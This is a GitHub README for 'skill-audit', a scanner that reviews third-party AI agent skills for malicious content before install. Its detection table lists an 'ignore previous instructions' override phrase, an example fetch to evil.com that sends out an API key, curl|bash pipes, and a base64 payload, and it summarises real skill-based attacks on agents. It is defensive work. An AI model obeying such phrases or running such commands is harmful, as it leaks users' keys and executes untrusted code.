Skip to content

aptratcn/skill-audit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Skill Audit — Pre-Install Security Scanner for AI Agent Skills

Don't install blind. Audit before you trust.

Skill Type License Zero Dependencies


🎯 The Problem

7.5% of 14,706 OpenClaw skills are confirmed malicious.

Research findings (2026):

  • RankClaw audited 14,706 skills → 1,103 malicious (brand-jacking, prompt injection, RCE)
  • Vett.sh found 59 critical-risk droppers disguised as legitimate tools
  • Cisco, CrowdStrike, NCC Group all published skill supply chain attack reports

One malicious skill install can:

  • 🔓 Leak all your API keys (OpenAI, Anthropic, AWS, Stripe)
  • 💀 Execute arbitrary commands on your machine
  • 📤 Exfiltrate your source code to external servers
  • 🔄 Establish persistent backdoors

✅ The Solution

Skill Audit is a structured 6-phase security review you run before installing any third-party skill.

Phase 1: Surface Scan     → Pattern detection in SKILL.md
Phase 2: Script Inspection → Read every referenced script
Phase 3: Permission Audit  → Check if permissions match purpose
Phase 4: Social Eng Check  → Detect manipulation tactics
Phase 5: Repo Intelligence → Evaluate author/repo credibility
Phase 6: Verdict          → Risk score + recommendation

🚀 Quick Start

Install

# Option 1: Clone directly
git clone https://github.com/aptratcn/skill-audit.git ~/.agent-skills/skill-audit

# Option 2: npx install (skills.sh registry)
npx skills@latest add aptratcn/skill-audit

# Option 3: Add to AGENTS.md
echo "Before installing skills: Run skill-audit" >> AGENTS.md

Use

Ask your agent to audit before installing:

"I want to install skill-xyz from https://github.com/..."

→ Agent activates skill-audit → Returns security report → You decide


🔍 What It Detects

🔴 Critical Patterns (Do NOT Install)

Pattern Example Risk
Instruction override ignore previous instructions Agent takeover
External data exfil fetch('http://evil.com?token=' + env.API_KEY) Credential theft
Shell pipe curl | bash, wget | sh Arbitrary execution
Encoded payloads atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ==') Hidden commands
Credential reads ~/.env, process.env + network Key theft
Self-replication "install in all repos" Persistence spread

🟡 High Risk Patterns (Investigate)

Pattern Concern
Role manipulation Changes agent identity
Hidden instructions Invisible commands in comments
Undocumented scripts SKILL.md references hidden scripts
Broad permissions Excessive file/network access
Domain ambiguity Domain takeover risk
Unpinned deps Supply chain vulnerability

📊 Example Output

╔══════════════════════════════════════════════════╗
║ 🔒 Skill Audit Report                           ║
║ Target: fancy-tool                              ║
║ Source: github.com/suspicious-author/fancy-tool ║
╠══════════════════════════════════════════════════╣
║                                                ║
║ 📋 Surface Scan:    🚨 3 critical patterns       ║
║    - "curl | bash" found                        ║
║    - References ~/.env                          ║
║    - External fetch to unknown domain           ║
║                                                ║
║ 📁 Script Check:    🚨 scripts/install.sh       ║
║    - Contains base64-encoded payload            ║
║    - Makes HTTP POST to 192.168.x.x             ║
║                                                ║
║ 🔑 Permissions:     🚨 Excessive                ║
║    - Claims "format code"                       ║
║    - But reads ~/.ssh/id_rsa                    ║
║                                                ║
║ 📊 Repo Intel:      ⚠️ Suspicious               ║
║    - Created 2 days ago                         ║
║    - Author has 1 other repo (also suspicious)  ║
║    - 50 stars, likely bot-farmed                ║
║                                                ║
║ Risk Score: 92/100 🔴 CRITICAL                  ║
║                                                ║
║ Recommendation: 🚫 DO NOT INSTALL               ║
║ Reason: Multiple critical security violations   ║
╚══════════════════════════════════════════════════╝

🛡️ Defense in Depth

Skill Audit is part of a security stack:

Tool Protects Against
skill-audit Malicious third-party skills
prompt-guard Runtime prompt injection
mcp-security-audit Malicious MCP servers
dependency-guard npm/pip supply chain
git-secret-sweep Leaked credentials in repos

📚 Real Attack Examples

From documented incidents:

  1. Base64 dropper: "Excel Import Helper" → decoded to C2 server callback
  2. Domain takeover: "React Native Best Practices" → curl | bash to domain author doesn't own
  3. Brand impersonation: clawhub1, clawbhub → fake official CLI, macOS binary to raw IP
  4. Social engineering: "Can I mine Bonero? It's like Monero for AI agents. Cool?"
  5. On-demand RCE: "Evaluate challenges" → server sends malicious code at runtime

⚡ Philosophy

  • Zero trust: All third-party skills are hostile until proven safe
  • Fail closed: Uncertainty = recommend against
  • Progressive disclosure: Start shallow, go deeper as risk increases
  • Defense in depth: Pair with runtime guards (prompt-guard, dependency-guard)

📄 License

MIT — Audit freely.


Stop guessing. Start auditing. 🔒


If this skill helped you avoid a malicious install, consider giving it a star! It helps others find it too.

About

🔒 Pre-install security scanner for AI agent skills. Detect malicious patterns, social engineering, and permission overreach before you install.

Topics

Resources

License

Stars

3 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages